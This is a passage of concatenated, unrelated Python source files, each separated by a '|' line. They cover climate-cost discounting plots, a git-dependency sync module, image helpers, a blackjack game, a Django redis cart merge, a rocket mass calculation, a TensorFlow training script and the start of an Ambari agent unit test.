elif dfcost.Variable.iloc[n] == 'Net negative CO2':
c = 0
elif dfcost.Variable.iloc[n] == 'Compensate CDR':
c = 0
else:
c = 0
for r in range(17):
if math.isnan(dfcost[str(int(yrs[r]))][n])==False:
dfcost[str(int(yrs[r]))].iloc[n] = dfcost[str(int(yrs[r]))].iloc[n]*c*1000*1000*1000 #convert from Gt to tons
dfcost.to_csv('costouttest.csv') # still has nans
# calculate one annual total per model & scenario combo
g = dfcost.groupby(['category', 'model', 'scenario']).agg({'2020': 'sum', '2025': 'sum', '2030': 'sum', '2035': 'sum', '2040': 'sum', '2045': 'sum', '2050': 'sum', '2055': 'sum', '2060': 'sum', '2065': 'sum', '2070': 'sum', '2075': 'sum', '2080': 'sum', '2085': 'sum', '2090': 'sum', '2095': 'sum', '2100':'sum'})
g = g.reset_index()
print(len(g))
print(g.columns)
# add a category column
g.to_csv('midpointout.csv')
# interpolate where necessary
for n in range(len(g)):
for r in range(15):
# check previous and next values
if g.iloc[n,r+4]==0:
if g.iloc[n, r+3] != 0:
if g.iloc[n,r+5] != 0:
g.iat[n, r+4] = (g.iloc[n, r+3] + g.iloc[n, r+5])/2
# reformat
for r in range(17-1):
lb = yrs[r]
ub = yrs[r+1]
for m in range(4):
g[str(int(lb+m+1))] = np.zeros(len(g))
for r in range(16):
lb = yrs[r]
ub = yrs[r+1]
for m in range(len(g)):
if math.isnan(df[str(int(lb))].iloc[m])==True:
lb = yrs[r-1]
if math.isnan(df[str(int(ub))].iloc[m])==True:
ub = yrs[r+2]
z = int(ub - lb - 1)
for q in range(z):
g[str(int(lb+q+1))].iloc[m] = (g[str(int(lb))].iloc[m]*(z-q)+g[str(int(ub))].iloc[m]*(q+1))/(z+1)
a = np.linspace(2000, 2100, 101).astype(int) #tolist()
a = a.tolist()
#print(a)
#print(df.columns)
#print(g.columns)
g = g.reindex(columns = ['model', 'scenario', 'category', '2020', '2021', '2022', '2023', '2024', '2025', '2026', '2027', '2028', '2029', '2030', '2031', '2032', '2033', '2034', '2035', '2036', '2037', '2038', '2039', '2040', '2041', '2042', '2043', '2044', '2045', '2046', '2047', '2048', '2049', '2050', '2051', '2052', '2053', '2054', '2055', '2056', '2057', '2058', '2059', '2060', '2061', '2062', '2063', '2064', '2065', '2066', '2067', '2068', '2069', '2070', '2071', '2072', '2073', '2074', '2075', '2076', '2077', '2078', '2079', '2080', '2081', '2082', '2083', '2084', '2085', '2086', '2087', '2088', '2089', '2090', '2091', '2092', '2093', '2094', '2095', '2096', '2097', '2098', '2099', '2100'])
print(df.Variable.unique())
g_discounted_stern = g.copy()
g_discounted_nordhaus = g.copy()
g_discounted_avg = g.copy()
# do some discounting
stern_delta = 0.001
nordhaus_delta = 0.015
avg_delta = (stern_delta+nordhaus_delta)/2
global_growth = 0.03 # this is a guesstimate, would need to review actual historical data
r = 0.03 # dummy discount rate
#n = 81
#g_discounted_stern['2100'] = g_discounted_stern['2100']*(1/((1+(r+stern_delta))**(n+1)))
for n in range(2100-2020+1):
g_discounted_stern[str(int(n+2020))] = g[str(int(n+2020))]*(1/((1+(r+stern_delta))**(n+1)))
g_discounted_nordhaus[str(int(n+2020))] = g[str(int(n+2020))]*(1/((1+(r+nordhaus_delta))**(n+1)))
g_discounted_avg[str(int(n+2020))] = g[str(int(n+2020))]*(1/((1+(r+avg_delta))**(n+1)))
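# The loop above discounts each year's cost back to 2020 as
#   cost_t / (1 + r + delta)**(t - 2020 + 1)
# e.g. with r = 0.03 and the Stern delta of 0.001, a cost incurred in 2021 is divided by
# (1.031)**2, roughly 1.063.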
# calculate NPVs
def calcNPV(df):
df['NPV'] = np.zeros(len(df))
for n in range(2100-2020+1):
df['NPV'] = df['NPV'] + df[str(int(n+2020))]
return df
g_discounted_stern = calcNPV(g_discounted_stern)
g_discounted_nordhaus = calcNPV(g_discounted_nordhaus)
g_discounted_avg = calcNPV(g_discounted_avg)
def makePlot(df, figName):
df1 = df.drop(columns = ['category', 'model', 'scenario', 'NPV'])
d = df1.values
plt.figure(figsize=(5,3.5))
ax1 = plt.subplot(position=[0.15, 0.13, 0.6, 0.7])
for m in range(len(d)):
plt.plot(np.linspace(2020, 2100, 81), d[m,:]/1000000000) #billions of dollars
plt.ylim(0,1100)
plt.xlabel('Year')
plt.ylabel('Billions of dollars')
plt.title('Annual Costs (discounted)')
npv = np.sum(d, axis = 1)
print(npv.shape)
ax2 = plt.subplot(position = [0.85, 0.13, 0.1, 0.7])
plt.boxplot(npv/1000000000000) #trillions of dollars
plt.ylim(0, 50)
plt.title('NPV')
plt.ylabel('Trillions of dollars')
plt.savefig(figName, dpi=300)
makePlot(g_discounted_stern, 'Figures/SternOut.png')
makePlot(g_discounted_nordhaus, 'Figures/NordhausOut.png')
makePlot(g_discounted_avg, 'Figures/AvgOut.png')
#print(g_discounted_avg[:5])
def makePlotbyCategory(df, figName):
d1 = df[df.category == 'Below 1.5C'].drop(columns = ['category', 'model', 'scenario', 'NPV'])
d2 = df[df.category == '1.5C low overshoot'].drop(columns = ['category', 'model', 'scenario', 'NPV'])
d3 = df[df.category == '1.5C high overshoot'].drop(columns = ['category', 'model', 'scenario', 'NPV'])
d4 = df[df.category == 'Lower 2C'].drop(columns = ['category', 'model', 'scenario', 'NPV'])
d5 = df[df.category == 'Higher 2C'].drop(columns = ['category', 'model', 'scenario', 'NPV'])
c = {'d1':d1.values, 'd2':d2.values, 'd3':d3.values, 'd4':d4.values, 'd5':d5.values}
labs = ('Below 1.5C', '1.5C low\novershoot', '1.5C high\novershoot', 'Lower 2C', 'Higher 2C')
plt.figure(figsize=(7, 4))
for n in range(5):
p = c['d'+str(n+1)]
plt.subplot(position = [0.08+0.135*n, 0.14, 0.12, 0.78])
#plt.subplot(position = [0.08+0.17*n, 0.14, 0.15, 0.78])
for m in range(len(p)):
plt.plot(np.linspace(2020, 2100, 81), p[m,:]/1000000000) #billions of dollars
plt.xlabel('Year', fontsize = 8)
plt.ylim(-100, 1000)
plt.title(labs[n], fontsize = 8)
plt.yticks([0, 200, 400, 600, 800, 1000], labels = (' ', ' ', ' ', ' ', ' ', ' '), fontsize = 8)
plt.xticks([2020, 2030, 2040, 2050, 2060, 2070, 2080, 2090, 2100], labels = ('2020', ' ', ' ', ' ', '2060', ' ', ' ', ' ', '2100'), fontsize =6, rotation = 90)
if n == 0:
plt.ylabel('Billions of dollars', fontsize = 8)
plt.yticks([0, 200, 400, 600, 800, 1000], labels = ('0', '200', '400', '600', '800', '1000'), fontsize = 6)
plt.subplot(position = [0.81, 0.14, 0.17, 0.78])
for n in range(5):
p = c['d'+str(n+1)]
npv = np.sum(p, axis = 1)/1000000000000 # trillions of dollars
plt.boxplot(npv, positions = [n]) #trillions of dollars
plt.ylim(-10, 50)
plt.xlim(-0.5, 4.5)
plt.ylabel('Trillions of dollars', fontsize = 8)
plt.yticks([0, 10, 20, 30, 40, 50], labels = ('0', '10', '20', '30', '40', '50'), fontsize = 6)
plt.xticks([0, 1,2,3,4], labels = labs, fontsize = 6, rotation = 90)
#plt.xticks([0, 1,2], labels = labs, fontsize = 6, rotation = 90)
plt.savefig(figName, dpi=300)
makePlotbyCategory(g_discounted_stern, 'Figures/SternByScenario.png')
makePlotbyCategory(g_discounted_nordhaus, 'Figures/NordhausByScenario.png')
makePlotbyCategory(g_discounted_avg, 'Figures/AvgByScenario.png')
|
from django.db import models
from git import Repo
import git
import shutil
import os
import json
def abs_path(path):
return os.path.abspath(os.path.join(os.path.dirname(__file__), '..', path))
env = {
'config101': abs_path('../101worker/configs/production.json'),
'config101schema': abs_path('../101worker/schemas/config.schema.json'),
'data101url': 'http://data.101companies.org/',
'diffs101dir': abs_path('../101diffs'),
'dumps101dir': abs_path('../101web/data/dumps'),
'data101dir': abs_path('../101web/data'),
'endpoint101url': 'http://101companies.org/endpoint/',
'explorer101url': 'http://101companies.org/resources/',
'extractor101dir': abs_path('../101worker/extractors'),
'gatheredGeshi101dir': abs_path('../101results/geshi'),
'gitdeps101dir': abs_path('../101results/gitdeps'),
'gitdeps101url': 'http://101companies.org/pullRepo.json',
'last101run': '0',
'logs101dir': abs_path('../101logs'),
'module101schema': abs_path( '../101worker/schemas/module.schema.json'),
'modules101dir': abs_path('../101worker/modules'),
'ontoDir': abs_path('../101web/data/onto'),
'output101dir': abs_path('..'),
'predicates101deps': abs_path('../101worker/modules/predicates101meta/module.json'),
'predicates101dir': abs_path('../101worker/predicates'),
'repo101dir': abs_path('../101results/101repo'),
'repo101url': 'https://github.com/101companies/101repo',
'results101dir': abs_path('../101results'),
'targets101dir': abs_path('../101web/data/resources'),
'temps101dir': abs_path('../101temps'),
'themes101dir': abs_path('../101web/data/resources/themes'),
'validator101dir': abs_path('../101worker/validators'),
'views101dir': abs_path('../101web/data/views'),
'web101dir': abs_path('../101web'),
'wiki101url': 'http://101companies.org/wiki/',
'worker101dir': abs_path('../101worker')
}
def convert_diff(diff):
file_1 = diff.a_path
file_2 = diff.b_path
if diff.a_mode == 0 and diff.a_blob is None:
return { 'type': 'DELETED_FILE', 'file': file_2 }
elif diff.b_mode == 0 and diff.b_blob is None:
return { 'type': 'NEW_FILE', 'file': file_1 }
else:
return { 'type': 'FILE_CHANGED', 'file': file_1 }
def copy_gitdeps(changes, env):
for change in changes:
if change['type'] == 'NEW_FILE':
target_file = os.path.join(env['repo101dir'], '/'.join(change['file'].split('/')[2:]))
dirname = os.path.dirname(target_file)
if not os.path.exists(dirname):
os.makedirs(dirname)
source_file = os.path.join(env['gitdeps101dir'], change['file'])
shutil.copyfile(source_file, target_file)
def pull_gitdeps(env, gitdeps):
def pull_gitdep(dep):
user = dep['sourcerepo'].split('/')[-2]
filename = dep['sourcerepo'].split('/')[-1].replace('.git', '')
path = os.path.join(env['gitdeps101dir'], user, filename)
if os.path.exists(os.path.join(path, '.git')):
repo = Repo(path)
return list(pull_repo(repo))
else:
try:
print(dep['sourcerepo'])
repo = Repo.clone_from(dep['sourcerepo'], path, branch='master')
result = []
for root, dirnames, filenames in os.walk(path):
for f in filenames:
f = os.path.join(root, f).replace(env['gitdeps101dir'], '')[1:]
if '.git/' in f:
continue
result.append({ 'type': 'NEW_FILE', 'file': f})
return result
except git.exc.GitCommandError:
return []
return sum(list(map(pull_gitdep, gitdeps)), [])
def load_gitdeps(env):
with open(os.path.abspath(os.path.join(env['repo101dir'], '.gitdeps'))) as f:
return json.load(f)
def pull_repo(repo):
base_commit = repo.head.commit.hexsha
info = repo.remotes.origin.pull('master')[0]
diffs = info.commit.diff(base_commit)
return list(map(lambda diff: convert_diff(diff), diffs))
def create_repo(env):
try:
return Repo(env['repo101dir'])
except git.exc.InvalidGitRepositoryError:
return Repo.clone_from('https://github.com/101companies/101repo.git', env['repo101dir'], branch='master')
def checkout_commit(repo, commit):
repo.git.checkout(commit)
def history(repo, commit):
return repo.iter_commits(commit)
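# A minimal usage sketch (assumption: the 101companies directory layout referenced by
# `env` exists and the repositories are reachable): open or clone the 101repo checkout,
# pull it, then pull the declared git dependencies and copy any new files into place.
def _demo_sync_101repo():
    repo = create_repo(env)
    changes = pull_repo(repo)
    gitdeps = load_gitdeps(env)
    changes += pull_gitdeps(env, gitdeps)
    copy_gitdeps(changes, env)
    return changes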
|
"""
Helper functions.
Source -> https://github.com/jrosebr1/imutils/blob/master/imutils/video/webcamvideostream.py
"""
import datetime
import io
from PIL import Image
import yaml
DATETIME_STR_FORMAT = "%Y-%m-%d_%H:%M:%S.%f"
def pil_image_to_byte_array(image):
imgByteArr = io.BytesIO()
image.save(imgByteArr, "PNG")
return imgByteArr.getvalue()
def byte_array_to_pil_image(byte_array):
return Image.open(io.BytesIO(byte_array))
def get_now_string() -> str:
return datetime.datetime.now().strftime(DATETIME_STR_FORMAT)
def get_config(config_filepath: str) -> dict:
with open(config_filepath) as f:
config = yaml.safe_load(f)
return config
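# A minimal round-trip sketch (hypothetical usage, not part of the original module):
# encode a PIL image to PNG bytes and decode it back.
def _demo_image_round_trip():
    original = Image.new("RGB", (4, 4), color=(255, 0, 0))
    payload = pil_image_to_byte_array(original)
    restored = byte_array_to_pil_image(payload)
    assert restored.size == (4, 4)
    return restored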
|
import random
from IPython.core.display import display, HTML
from IPython.display import clear_output
board = [
"┌───┬───┬───┐",
"│ 7 │ 8 │ 9 │",
"├───┼───┼───┤",
"│ 4 │ 5 │ 6 │",
"├───┼───┼───┤",
"│ 1 │ 2 │ 3 │",
"└───┴───┴───┘"
]
class Card:
def __init__(self, suit, rank, values, icon):
self.suit = suit
self.rank = rank
self.values = list(values)
self.icon = icon
class Deck():
def __init__(self):
self.cards = []
generic_cards = [('ace', [1, 11])]
for i in range(2, 11):
generic_cards.append((f'{i}', [i]))
for face in ['jack', 'queen', 'king']:
generic_cards.append((face, [10]))
cards_graphic = list('🂱🂲🂳🂴🂵🂶🂷🂸🂹🂺🂻🂽🂾🂡🂢🂣🂤🂥🂦🂧🂨🂩🂪🂫🂭🂮🃁🃂🃃🃄🃅🃆🃇🃈🃉🃊🃋🃍🃎🃑🃒🃓🃔🃕🃖🃗🃘🃙🃚🃛🃝🃞')
for base, suit in enumerate(['hearts', 'spades', 'diamonds', 'clubs']):
for i, card in enumerate(generic_cards):
self.cards.append(Card(suit=suit, rank=card[0], values=card[1],
icon=cards_graphic.pop(0)))
random.shuffle(self.cards)
def __len__(self):
return len(self.cards)
def __str__(self):
result = ''
for card in self.cards:
result += f'{card.icon}'
return result
def pop(self):
return self.cards.pop()
class Hand():
def __init__(self):
self.cards = []
def is_bust(self):
total = 0
for card in self.cards:
total += min(card.values)
return total > 21
def is_blackjack(self):
if self.is_bust():
return False
return 21 in self.totals()
def append(self, card):
self.cards.append(card)
return not self.is_bust()
def totals(self):
totals = [0]
for card in self.cards:
if len(card.values) == 1:
for i, total in enumerate(totals):
totals[i] += card.values[0]
continue
second_options = totals.copy()
for i, total in enumerate(totals):
totals[i] += card.values[0]
second_options[i] += card.values[1]
totals += second_options
return list(filter(lambda x: x <= 21, set(totals)))
def __str__(self):
result = ''
for card in self.cards:
result += card.icon
return result
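# A small worked example (hypothetical helper, not used by the game loop): an ace plus
# a nine yields both a hard and a soft total, and totals() keeps only values <= 21.
def _demo_hand_totals():
    hand = Hand()
    hand.append(Card(suit='spades', rank='ace', values=[1, 11], icon='🂡'))
    hand.append(Card(suit='hearts', rank='9', values=[9], icon='🂹'))
    assert sorted(hand.totals()) == [10, 20]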
class Player(Hand):
def __init__(self):
Hand.__init__(self)
self.hidden = None
def dealt_hidden(self, card):
self.hidden = card
def dealt(self, card):
self.append(card)
return not self.is_bust()
def score(self):
if len(self.totals()) == 0:
return 0
return max(self.totals())
def __str__(self):
result = Hand.__str__(self)
if self.hidden is not None:
result += '?'
totals = self.totals()
result += f' {totals}'
return result
class Dealer(Player):
def __init__(self):
Player.__init__(self)
def reveal(self):
card = self.hidden
self.dealt(card)
self.hidden = None
return card
def is_standing(self):
totals = self.totals()
for total in totals:
if total >= 17:
return True
return False
class Table():
def __init__(self):
self.dealer = Dealer()
self.player = Player()
self.deck = Deck()
self.player.dealt(self.deck.pop())
self.player.dealt(self.deck.pop())
self.dealer.dealt(self.deck.pop())
self.dealer.dealt_hidden(self.deck.pop())
self.pot = 0
def print(self):
clear_output()
print(f"Dealer {self.dealer}")
print(f"Player {self.player}")
    # pot is a plain integer attribute, set to 0 in __init__ and increased by each bet
    # in player_rounds(); the old pot() method shadowed by that attribute was removed.
def player_rounds(self, bank):
while True:
balance = bank.balance('player')
bet = input(f'Please make your bet {balance} : ')
try:
if int(bet) <= 0:
continue
bank.withdraw('player', int(bet))
self.pot += int(bet)
break
except Exception as e:
print(e)
continue
# Player chooses actions in a loop until they want to stop, hit 21, or are bust
while True:
self.print()
if self.player.is_blackjack():
print(f"player has blackjack")
break
while True:
choice = input("'h'it or 's'tand : ")
if choice in ['s', 'h']:
break
if choice == 's':
break
card = self.deck.pop()
if not self.player.dealt(card):
print(f"player dealt {card.icon} and busted")
break
if self.player.is_blackjack():
print(f"player dealt {card.icon} and has blackjack")
break
print(f"player dealt {card.icon}")
return self.player.score()
def dealer_rounds(self):
# Dealer after players are done then exposes the hidden card
# they continue pulling cards until they exceed 17, or bust
if not self.player.is_bust():
card = self.dealer.reveal()
while True:
self.print()
if self.dealer.is_blackjack():
print(f"dealer dealt {card.icon} and has blackjack")
break
if self.dealer.is_bust():
print(f'dealer is bust')
break
if self.dealer.is_standing():
break
card = self.deck.pop()
self.dealer.dealt(card)
return self.dealer.score()
class AccountExistsError(Exception):
pass
class AccountNotFoundError(Exception):
pass
class InSufficentFunds(Exception):
pass
class Bank():
def __init__(self):
self.players = dict()
def open(self, name, amount):
if name in self.players:
raise AccountExistsError()
self.players[name] = amount
def withdraw(self, name, amount):
if name not in self.players:
raise AccountNotFoundError()
if self.players[name] < amount:
raise InSufficentFunds()
self.players[name] -= amount
return self.players[name]
    def deposit(self, name, amount):
        if name not in self.players:
            raise AccountNotFoundError()
        self.players[name] += amount
        return self.players[name]
def balance(self, name):
if name not in self.players:
raise AccountNotFoundError()
return self.players[name]
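# A minimal sketch of the Bank API (hypothetical account name): open an account,
# place a bet by withdrawing, and check the remaining balance.
def _demo_bank_usage():
    bank = Bank()
    bank.open('demo_player', 100)
    bank.withdraw('demo_player', 30)
    assert bank.balance('demo_player') == 70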
def run_hands(table, bank):
player_score = table.player_rounds(bank)
dealer_score = table.dealer_rounds()
if not table.player.is_bust() and player_score > dealer_score:
return 'player'
return 'dealer'
def run_game(bank):
if bank.balance('player') <= 0:
raise InSufficentFunds()
table = Table()
winner = run_hands(table, bank)
if winner == 'player':
        bank.deposit('player', table.pot)
def run():
bank = Bank()
bank.open('player', 100)
while True:
balance = bank.balance('player')
print(f'player has {balance} chips')
run_game(bank)
if __name__ == "__main__":
try:
run()
except InSufficentFunds:
print("Thank you for playing, bring more gold next time")
|
from django_redis import get_redis_connection
from utils import myjson
def merge_cart_cookie_to_redis(request, user_id, response):
"""
    Merge the shopping cart stored in the cookie into redis.
    :param request: used to read the cart cookie
    :param user_id: id of the currently logged-in user
    :param response: response object, used to clear the cookie data
    :return: the response, with the cart cookie removed
"""
    # Read the cart data from the cookie
cart_str = request.COOKIES.get("cart")
    # If it is empty, return the response unchanged
if not cart_str:
return response
    # Decode the cookie cart data into a dict
cookie_cart_dict = myjson.loads(cart_str)
    # Dict that will be written to redis
redis_cart_dict = {}
    # Track the selection state of each sku_id in redis
    redis_cart_selected_add = []  # sku_ids to add to the selected set
    redis_cart_selected_remove = []  # sku_ids to remove from the selected set
    # Get a redis connection
redis_conn = get_redis_connection("cart")
redis_pip = redis_conn.pipeline()
    # Merge the cookie cart with the redis cart, collecting the result in redis_cart_dict
for sku_id, count_select_dict in cookie_cart_dict.items():
"""
cookie中数据保存格式
{
sku_id: {
"count": xxx, // 数量
"selected": True // 是否勾选
},
...
}
"""
        # Record the item quantity
redis_cart_dict[sku_id] = count_select_dict['count']
        # Record the selection state: if selected, queue the sku_id for sadd, otherwise for srem
if count_select_dict['selected']:
redis_cart_selected_add.append(sku_id)
else:
redis_cart_selected_remove.append(sku_id)
    # If anything was collected, write it to redis
if redis_cart_dict:
redis_pip.hmset('cart_%s' % user_id, redis_cart_dict)
if redis_cart_selected_add:
redis_pip.sadd('cart_selected_%s' % user_id, *redis_cart_selected_add)
if redis_cart_selected_remove:
redis_pip.srem('cart_selected_%s' % user_id, *redis_cart_selected_remove)
redis_pip.execute()
    # Remove the cart data stored in the cookie
# response.delete_cookie('cart')
response.set_cookie('cart', 0, max_age=0)
return response
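# Illustrative example (hypothetical data): a cookie cart of
#   {"1": {"count": 3, "selected": True}, "2": {"count": 1, "selected": False}}
# ends up in redis as HMSET cart_<user_id> {"1": 3, "2": 1},
# SADD cart_selected_<user_id> "1" and SREM cart_selected_<user_id> "2",
# after which the cart cookie is expired on the response.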
|
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 27 20:14:02 2014
@author: Julian
calculating the physics of a reusable rocket with controlled powered return capability
Initial Vehicle input is retrieved from reqs.dat
"""
import numpy as np
import matplotlib.pyplot as plt
input_data = np.genfromtxt('reqs.dat', dtype='float', comments='#', delimiter=' ')
I_sp = input_data[0]
PL = input_data[1]
DV = input_data[2]
lamb = PL/(505846-PL)
c = I_sp * 9.81
MR = np.exp(DV/c)
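# MR is the mass ratio M_0/M_e implied by the Tsiolkovsky rocket equation
# DV = c * ln(M_0/M_e), with effective exhaust velocity c = I_sp * 9.81.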
eps = (1+lamb+lamb*MR)/MR
#rocket mass ratios
M_s = PL * eps/lamb
M_e = M_s + PL
M_0 = MR * M_e
M_f = M_0 - M_e
M_s, M_e, M_0, M_f = (np.round((M_s, M_e, M_0, M_f), decimals=0))
print
print 'Required rocket data (not reusable):'
print
print 'Payload Mass: ', PL, '[kg]'
print 'Structural Mass: ', M_s, '[kg]'
print 'Empty Mass: ', M_e, '[kg]'
print 'Fuel Mass: ', M_f, '[kg]'
print 'Lift-Off Mass: ', M_0, '[kg]'
MR = np.exp(DV/c)
M_sr = M_s/ ((MR*(1-1/MR))*(1+1/(MR*(1-1/MR))))
M_e = M_sr + PL
M_fr = (MR+1)*M_sr + M_f
M_0 = M_e + M_sr + M_fr
M_sr, M_e, M_0, M_fr = (np.round((M_sr, M_e, M_0, M_fr), decimals=0))
print
print 'Required rocket data (reusable):'
print
print 'Payload Mass: ', PL, '[kg]'
print 'Structural Mass: ', M_sr, '[kg]'
print 'Empty Mass: ', M_e, '[kg]'
print 'Fuel Mass: ', M_fr, '[kg]'
print 'Lift-Off Mass: ', M_0, '[kg]'
print
print (PL/lamb+PL)*np.exp(-2*DV/c)
|
#!/usr/bin/env python
import os
import json
import logging
import numpy as np
import tensorflow as tf
from tensorflow.contrib import rnn
from cell import dnn_cell
def main():
trainRnnModel = TrainRnnModel()
trainRnnModel.train()
class TrainRnnModel(object):
def __init__(self):
self.name_variabel_map = {}
def train(self):
json_file_path = "./examples/dnn_example.json"
rnn_model = dnn_cell.DnnModel.load_from_json(json_file_path)
print("Build model op")
#x_train = np.ones((32, 784))
x_train = np.random.rand(32, 784)
#y_train = np.zeros((32, 10))
y_train = np.random.randint(0, 2, size=(32, 10))
input_feature_size = 784
output_label_size = 10
learning_rate = 0.5
epoch_number = 10
batch_size = 1
buffer_size = 10
step_to_validate = 1
tensorboard_path = "./tensorboard"
if os.path.exists(tensorboard_path) == False:
os.makedirs(tensorboard_path)
checkpoint_path = "./checkpoint"
if os.path.exists(checkpoint_path) == False:
os.makedirs(checkpoint_path)
checkpoint_file = checkpoint_path + "/checkpoint.ckpt"
latest_checkpoint = tf.train.latest_checkpoint(checkpoint_path)
x_placeholder = tf.placeholder(tf.float32, [None, input_feature_size])
y_placeholder = tf.placeholder(tf.float32, [None, output_label_size])
print("Build train graph")
global_step = tf.Variable(
0, dtype=tf.int32, trainable=False, name="global_step")
# input layer
"""
output0 = fc_layer(x_placeholder, input_feature_size, input_feature_size, activation="tanh", index=0)
output1 = fc_layer(output0, input_feature_size, input_feature_size, activation="tanh", index=1)
output2 = fc_layer(output1, input_feature_size, input_feature_size, activation="tanh", index=2)
output7 = fc_layer(output1, input_feature_size, input_feature_size, activation="tanh", index=7)
average_output = (output2 + output7) / 2
"""
total_node_number = len(rnn_model.nodes)
# Example: {"0": Output0, "1": Output1, "2: Output2}
index_output_map = {}
for i in range(total_node_number):
# TODO: Need to make sure that nodes are stores with index in array
node = rnn_model.nodes[i]
if i == 0:
input = x_placeholder
else:
input = index_output_map.get(str(node.previous_index), None)
output = self.fc_layer(
input,
input_feature_size,
input_feature_size,
activation_function=node.activation_function,
index=node.index)
index_output_map[str(i)] = output
# Example: [0, 1, 1, 1, 0, 0, 1, 1, 1, 0, 1, 0]
have_next_node_array = [0 for i in range(total_node_number)]
for node in rnn_model.nodes:
if node.previous_index is not None:
have_next_node_array[node.previous_index] = 1
average_output = None
not_have_next_total_number = 0
for i in range(total_node_number):
if have_next_node_array[i] == 0:
not_have_next_total_number += 1
if average_output == None:
average_output = index_output_map.get(str(i), None)
else:
average_output += index_output_map.get(str(i), None)
average_output = average_output / not_have_next_total_number
# output layer
input = average_output
output_w = tf.get_variable(
"output_w", [input_feature_size, output_label_size],
dtype=tf.float32,
initializer=tf.zeros_initializer)
output_b = tf.get_variable(
"output_b", [output_label_size],
dtype=tf.float32,
initializer=tf.zeros_initializer)
logits = tf.matmul(input, output_w) + output_b
#loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=y_placeholder))
loss = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(
logits=logits, labels=y_placeholder))
train_op = tf.train.GradientDescentOptimizer(learning_rate).minimize(
loss, global_step=global_step)
# Save Variables with names in order to restore from other architectures
saver = tf.train.Saver(self.name_variabel_map)
tf.summary.scalar("global_step", global_step)
summary_op = tf.summary.merge_all()
# Start training
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
writer = tf.summary.FileWriter(tensorboard_path, sess.graph)
self.restore_from_checkpoint(sess, saver, latest_checkpoint)
try:
for i in range(epoch_number):
_, loss_value, step_value = sess.run(
[train_op, loss, global_step],
feed_dict={x_placeholder: x_train,
y_placeholder: y_train})
if step_value % step_to_validate == 0:
summary_value = sess.run(summary_op)
print("Run step: {}, loss: {}".format(step_value, loss_value))
writer.add_summary(summary_value, step_value)
saver.save(sess, checkpoint_file, global_step=step_value)
except tf.errors.OutOfRangeError:
print("End of training")
def restore_from_checkpoint(self, sess, saver, checkpoint):
if checkpoint:
logging.info("Restore session from checkpoint: {}".format(checkpoint))
saver.restore(sess, checkpoint)
return True
else:
logging.warn("Checkpoint not found: {}".format(checkpoint))
return False
def fc_layer(self,
input,
input_shape,
output_shape,
activation_function="tanh",
index=None):
"""
weight = tf.get_variable(
"weight_{}".format(index), [input_shape, output_shape],
dtype=tf.float32,
initializer=tf.zeros_initializer)
bias = tf.get_variable(
"bias_{}".format(index), [output_shape],
dtype=tf.float32,
initializer=tf.zeros_initializer)
"""
weight = tf.get_variable(
"weight_{}".format(index), [input_shape, output_shape],
dtype=tf.float32,
initializer=None)
bias = tf.get_variable(
"bias_{}".format(index), [output_shape],
dtype=tf.float32,
initializer=None)
self.name_variabel_map["weight_{}".format(index)] = weight
self.name_variabel_map["bias_{}".format(index)] = bias
output = tf.matmul(input, weight) + bias
if activation_function == "tanh":
output = tf.nn.tanh(output)
elif activation_function == "relu":
output = tf.nn.relu(output)
elif activation_function == "identity":
output = output
elif activation_function == "sigmoid":
output = tf.nn.sigmoid(output)
else:
output = tf.nn.relu(output)
return output
def lstm_layer(self,
input,
input_shape,
output_shape,
activation_function="tanh",
index=None):
RNN_HIDDEN_UNITS = 32
RNN_LAYER_NUMBER = 2
weight = tf.get_variable(
"weight_{}".format(index), [RNN_HIDDEN_UNITS, output_shape],
dtype=tf.float32,
initializer=None)
bias = tf.get_variable(
"bias_{}".format(index), [output_shape],
dtype=tf.float32,
initializer=None)
self.name_variabel_map["weight_{}".format(index)] = weight
self.name_variabel_map["bias_{}".format(index)] = bias
lstm_cell = rnn.BasicLSTMCell(RNN_HIDDEN_UNITS, forget_bias=1.0)
lstm_cells = rnn.MultiRNNCell([lstm_cell] * RNN_LAYER_NUMBER)
# TODO: Not work for construct sequence input
#x = tf.transpose(input, [1, 0, 2, 3])
# x changes to [32 * BATCH_SIZE, 32 * 3]
x = tf.reshape(input, [-1, 784])
# x changes to array of 32 * [BATCH_SIZE, 32 * 3]
x = tf.split(axis=0, num_or_size_splits=32, value=x)
outputs, states = rnn.static_rnn(lstm_cells, x, dtype=tf.float32)
output = tf.matmul(outputs[-1], weight) + bias
if activation_function == "tanh":
output = tf.nn.tanh(output)
elif activation_function == "relu":
output = tf.nn.relu(output)
elif activation_function == "identity":
output = output
elif activation_function == "sigmoid":
output = tf.nn.sigmoid(output)
else:
output = tf.nn.relu(output)
return output
if __name__ == "__main__":
main()
|
#!/usr/bin/env python2.6
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import StringIO
import sys
from ambari_agent import NetUtil, security
from mock.mock import MagicMock, patch, ANY
import unittest
from ambari_agent import ProcessHelper, main
from ambari_agent import ProcessHelper, main
import logging
import signal
from ambari_agent.AmbariConfig import AmbariConfig
import ConfigParser
import os
import tempfile
from ambari_agent.PingPortListener import PingPortListener
from ambari_agent.Controller import Controller
from optparse import OptionParser
from ambari_agent.DataCleaner import DataCleaner
class TestMain(unittest.TestCase):
def setUp(self):
# disable stdout
out = StringIO.StringIO()
sys.stdout = out
def tearDown(self):
# enable stdout
sys.stdout = sys.__stdout__
@patch("os._exit")
@patch("os.getpid")
@patch.object(ProcessHelper, "stopAgent")
def test_signal_handler(self, stopAgent_mock, os_getpid_mock, os_exit_mock):
# testing exit of children
main.agentPid = 4444
os_getpid_mock.return_value = 5555
main.signal_handler("signum", "frame")
self.assertTrue(os_exit_mock.called)
os_exit_mock.reset_mock()
# testing exit of main process
os_getpid_mock.return_value = main.agentPid
main.signal_handler("signum", "frame")
self.assertFalse(os_exit_mock.called)
self.assertTrue(stopAgent_mock.called)
@patch.object(main.logger, "addHandler")
@patch.object(main.logger, "setLevel")
@patch("logging.handlers.RotatingFileHandler")
def test_setup_logging(self, rfh_mock, setLevel_mock, addHandler_mock):
# Testing silent mode
main.setup_logging(False)
